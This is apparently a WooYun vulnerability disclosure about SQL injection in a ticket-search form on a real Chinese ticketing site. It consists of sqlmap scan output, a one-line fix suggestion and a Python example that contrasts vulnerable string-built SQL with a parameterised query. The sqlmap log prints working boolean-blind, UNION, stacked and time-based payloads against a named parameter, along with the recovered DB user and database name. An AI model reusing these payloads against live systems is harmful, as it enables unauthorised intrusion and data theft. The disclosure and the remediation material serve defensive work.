[13:15:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:15:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:15:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:15:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:15:25] [INFO] GET parameter 'Name' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[13:15:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:15:45] [INFO] checking if the injection point on GET parameter 'Name' is a f
alse positive
[13:15:46] [WARNING] false positive or unexploitable injection point detected
[13:15:46] [WARNING] GET parameter 'Name' is not injectable
[13:15:46] [WARNING] GET parameter 'Source' does not appear dynamic
[13:15:46] [WARNING] heuristic (basic) test shows that GET parameter 'Source' mi
ght not be injectable
[13:15:46] [INFO] testing for SQL injection on GET parameter 'Source'
[13:15:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:15:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:16:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:16:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:16:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:16:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:17:00] [WARNING] GET parameter 'Source' is not injectable
[13:17:00] [WARNING] GET parameter 'tickettypeid' does not appear dynamic
[13:17:01] [WARNING] heuristic (basic) test shows that GET parameter 'tickettype
id' might not be injectable
[13:17:01] [INFO] testing for SQL injection on GET parameter 'tickettypeid'
[13:17:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:17:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:17:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:17:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:17:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:17:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:18:25] [WARNING] GET parameter 'tickettypeid' is not injectable
[13:18:25] [WARNING] GET parameter 'ticketdays' does not appear dynamic
[13:18:26] [WARNING] heuristic (basic) test shows that GET parameter 'ticketdays
' might not be injectable
[13:18:26] [INFO] testing for SQL injection on GET parameter 'ticketdays'
[13:18:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:18:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:18:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:18:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:18:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:18:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:19:39] [WARNING] GET parameter 'ticketdays' is not injectable
[13:19:39] [WARNING] GET parameter 'ticketaddrid' does not appear dynamic
[13:19:40] [WARNING] heuristic (basic) test shows that GET parameter 'ticketaddr
id' might not be injectable
[13:19:40] [INFO] testing for SQL injection on GET parameter 'ticketaddrid'
[13:19:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:19:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[13:19:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:19:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:20:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:20:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:20:55] [WARNING] GET parameter 'ticketaddrid' is not injectable
sqlmap identified the following injection points with a total of 1092 HTTP(s) re
quests:
---
Place: POST
Parameter: TicketSearch1:KeyWord
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=[base64 __VIEWSTATE blob omitted]&TicketSearch1:KeyWord=12%' AND 9386=9386 AND '%'='&TicketSearch1:BtnSearchKey=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=
---
[13:20:55] [INFO] testing Microsoft SQL Server
[13:20:55] [INFO] confirming Microsoft SQL Server
[13:20:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[13:20:55] [INFO] fetching current user
[13:20:55] [INFO] retrieving the length of query output
[13:20:55] [INFO] resumed: 8
[13:20:55] [INFO] resumed: web61247
current user: 'web61247'
[13:20:55] [INFO] fetching current database
[13:20:55] [INFO] retrieving the length of query output
[13:20:55] [INFO] resumed: 14
[13:20:55] [INFO] resumed: www_51piao_com
current database: 'www_51piao_com'
[13:20:55] [INFO] testing if current user is DBA
[13:20:56] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
Tested again with --level 3 added, but name and ticketaddrid were not detected.
sqlmap identified the following injection points with a total of 4519 HTTP(s) re
quests:
---
Place: POST
Parameter: TicketSearch1:KeyWord
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=[base64 __VIEWSTATE blob omitted]&TicketSearch1:KeyWord=12%') AND 9259=9259 AND ('%'='&TicketSearch1:BtnSearchKey=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: __VIEWSTATE=[base64 __VIEWSTATE blob omitted]&TicketSearch1:KeyWord=-3186%') UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(115)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(75)+CHAR(84)+CHAR(81)+CHAR(76)+CHAR(84)+CHAR(119)+CHAR(104)+CHAR(98)+CHAR(85)+CHAR(113)+CHAR(104)+CHAR(119)+CHAR(112)+CHAR(113)-- &TicketSearch1:BtnSearchKey=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=[base64 __VIEWSTATE blob omitted]&TicketSearch1:KeyWord=12%'); WAITFOR DELAY '0:0:5'--&TicketSearch1:BtnSearchKey=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=[base64 __VIEWSTATE blob omitted]&TicketSearch1:KeyWord=12%') WAITFOR DELAY '0:0:5'--&TicketSearch1:BtnSearchKey=%E6%90%9C%E7%B4%A2&TicketSearch1:Day1=&TicketSearch1:Day2=&TicketSearch1:Price1=&TicketSearch1:Price2=
---
[14:29:32] [INFO] testing Microsoft SQL Server
[14:29:33] [INFO] confirming Microsoft SQL Server
[14:29:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[14:29:35] [INFO] fetching current user
current user: 'web61247'
[14:29:35] [INFO] fetching current database
current database: 'www_51piao_com'
[14:29:36] [INFO] testing if current user is DBA
current user is DBA: False

Proof of vulnerability:

As above

Fix recommendation:

Fix by filtering input
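The fix recommendation is a single line; as an added illustration that is not the report's or the site's code, the block below puts the concatenated-LIKE pattern that the reported boolean-based payload exploits next to a parameterised query, using an in-memory SQLite table as a stand-in for the SQL Server 2000 backend (the equivalent change in the ASP.NET code would be a SqlCommand with SqlParameter). The table, columns and function names are assumptions; TRUE_PAYLOAD is the payload quoted in the sqlmap output above.

```python
import sqlite3

# Constructed sample rows standing in for the site's ticket table (assumed schema).
TICKETS = [("Concert A", 11), ("Ticket 12", 11), ("Drama 123", 157)]

# Boolean-based blind payload exactly as sqlmap reported it for TicketSearch1:KeyWord.
TRUE_PAYLOAD = "12%' AND 9386=9386 AND '%'='"
# Constructed variant with the same shape but a false condition; a blind oracle
# works precisely because the two produce different result sets.
FALSE_PAYLOAD = "12%' AND 9386=9385 AND '%'='"


def make_db():
    """In-memory SQLite stand-in for the SQL Server backend (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ticket (name TEXT, cityid INTEGER)")
    conn.executemany("INSERT INTO ticket VALUES (?, ?)", TICKETS)
    return conn


def search_vulnerable(conn, keyword):
    """The defect class behind the report: keyword concatenated into a LIKE literal.

    With TRUE_PAYLOAD the statement becomes
      ... WHERE name LIKE '%12%' AND 9386=9386 AND '%'='%'
    so the quote in the input closes the literal and the trailing '%'=' re-balances it.
    """
    sql = "SELECT name FROM ticket WHERE name LIKE '%" + keyword + "%'"
    return sorted(row[0] for row in conn.execute(sql))


def escape_like(text):
    """Escape LIKE metacharacters so user input cannot widen the match."""
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_fixed(conn, keyword):
    """Parameterised version: the keyword is bound as data and never parsed as SQL."""
    pattern = "%" + escape_like(keyword) + "%"
    rows = conn.execute(
        "SELECT name FROM ticket WHERE name LIKE ? ESCAPE '\\'", (pattern,))
    return sorted(row[0] for row in rows)


def oracle_leaks(search):
    """True if a true/false payload pair yields different results, i.e. a usable
    boolean-based blind oracle exists for the given search implementation."""
    conn = make_db()
    return search(conn, TRUE_PAYLOAD) != search(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    print("vulnerable search leaks:", oracle_leaks(search_vulnerable))  # True
    print("fixed search leaks:     ", oracle_leaks(search_fixed))       # False
```

The parameterised search still returns the expected rows for an ordinary keyword such as "12", which is the check to run before shipping the fix.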

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined